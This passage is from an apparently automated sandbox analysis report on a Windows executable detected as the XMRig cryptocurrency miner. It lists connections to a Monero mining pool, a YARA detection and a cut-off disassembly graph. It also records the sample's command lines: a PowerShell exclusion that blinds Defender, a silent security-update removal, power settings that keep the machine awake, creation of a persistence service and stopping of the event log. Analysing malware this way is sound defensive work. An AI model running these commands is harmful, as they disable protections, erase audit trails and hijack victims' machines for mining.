                                                      Oct 13, 2024 19:10:30.451277971 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:30.676058054 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:36.519984961 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:36.660599947 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:46.584836960 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:46.691725016 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:56.415402889 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:56.488476992 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:06.502463102 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:06.675883055 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:16.728579044 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:16.852247953 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:26.531960011 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:26.675842047 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:36.651371002 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:36.785264969 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:39.720444918 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:39.725729942 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:39.905123949 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:39.961898088 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:46.531953096 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:46.675685883 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:11:56.532612085 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:11:56.691246986 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:12:06.670816898 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:12:06.722445965 CEST4971310343192.168.2.651.15.65.182

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 13, 2024 19:10:05.154194117 CEST6320453192.168.2.61.1.1.1
                                                      Oct 13, 2024 19:10:05.162425995 CEST53632041.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 13, 2024 19:10:05.154194117 CEST192.168.2.61.1.1.10x8f5eStandard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:10:05.162425995 CEST1.1.1.1192.168.2.60x8f5eNo error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:13:09:58
                                                      Start date:13/10/2024
                                                      Path:C:\Users\user\Desktop\WWhhc3A0rs.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\WWhhc3A0rs.exe"
                                                      Imagebase:0x7ff71eb10000
                                                      File size:2'729'064 bytes
                                                      MD5 hash:5DF14B213736E361758FEC790BD16721
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:13:09:58
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:13:09:58
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e40d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "VKWMZEFB"
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6b1b50000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "VKWMZEFB"
                                                      Imagebase:0x7ff6242b0000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:13:10:01
                                                      Start date:13/10/2024
                                                      Path:C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
                                                      Imagebase:0x7ff701160000
                                                      File size:2'729'064 bytes
                                                      MD5 hash:5DF14B213736E361758FEC790BD16721
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 58%, ReversingLabs
                                                      • Detection: 62%, Virustotal, Browse
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:13:10:02
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:13:10:02
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e40d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff775ee0000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:36
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:conhost.exe
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F36EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      General

                                                      Target ID:39
                                                      Start time:13:10:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6b1b50000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:44
                                                      Start time:13:10:43
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                      Imagebase:0x7ff7403e0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:13.8%
                                                        Total number of Nodes:1347
                                                        Total number of Limit Nodes:2
                                                        execution_graph 3858 7ff71eb1219e 3859 7ff71eb121ab EnterCriticalSection 3858->3859 3860 7ff71eb12272 3858->3860 3861 7ff71eb12265 LeaveCriticalSection 3859->3861 3863 7ff71eb121c8 3859->3863 3861->3860 3862 7ff71eb121e9 TlsGetValue GetLastError 3862->3863 3863->3861 3863->3862 2478 7ff71eb11140 2481 7ff71eb11160 2478->2481 2480 7ff71eb11156 2482 7ff71eb111b9 2481->2482 2483 7ff71eb1118b 2481->2483 2484 7ff71eb111c7 _amsg_exit 2482->2484 2485 7ff71eb111d3 2482->2485 2483->2482 2486 7ff71eb11190 2483->2486 2484->2485 2488 7ff71eb1121a 2485->2488 2489 7ff71eb11201 _initterm 2485->2489 2486->2482 2487 7ff71eb111a0 Sleep 2486->2487 2487->2482 2487->2486 2506 7ff71eb11880 2488->2506 2489->2488 2491 7ff71eb11247 SetUnhandledExceptionFilter 2492 7ff71eb1126a 2491->2492 2493 7ff71eb1126f malloc 2492->2493 2494 7ff71eb1128b 2493->2494 2497 7ff71eb112d2 2493->2497 2495 7ff71eb112a0 strlen malloc memcpy 2494->2495 2495->2495 2496 7ff71eb112d0 2495->2496 2496->2497 2516 7ff71eb13b50 2497->2516 2499 7ff71eb11315 2500 7ff71eb11344 2499->2500 2501 7ff71eb11324 2499->2501 2504 7ff71eb11160 93 API calls 2500->2504 2502 7ff71eb11338 2501->2502 2503 7ff71eb1132d _cexit 2501->2503 2502->2480 2503->2502 2505 7ff71eb11366 2504->2505 2505->2480 2507 7ff71eb118a2 2506->2507 2512 7ff71eb11a0f 2506->2512 2508 7ff71eb11956 2507->2508 2511 7ff71eb1199e 2507->2511 2507->2512 2508->2511 2691 7ff71eb11ba0 2508->2691 2510 7ff71eb119e9 VirtualProtect 2510->2511 2511->2510 2511->2512 2513 7ff71eb11b36 2511->2513 2512->2491 2514 7ff71eb11ba0 4 API calls 2513->2514 2515 7ff71eb11b53 2514->2515 2515->2512 2519 7ff71eb13b66 2516->2519 2517 7ff71eb13c60 wcslen 2701 7ff71eb1153f 2517->2701 2519->2517 2523 7ff71eb13d60 2526 7ff71eb13d7a memset wcscat memset 2523->2526 2528 7ff71eb13dd3 2526->2528 2529 7ff71eb13e23 wcslen 2528->2529 2530 7ff71eb13e35 2529->2530 2532 7ff71eb13e7c 2529->2532 2531 7ff71eb13e50 _wcsnicmp 2530->2531 2531->2532 2533 7ff71eb13e66 wcslen 2531->2533 2534 7ff71eb13edd wcscpy wcscat memset 2532->2534 2533->2531 2533->2532 2535 7ff71eb13f1c 2534->2535 2536 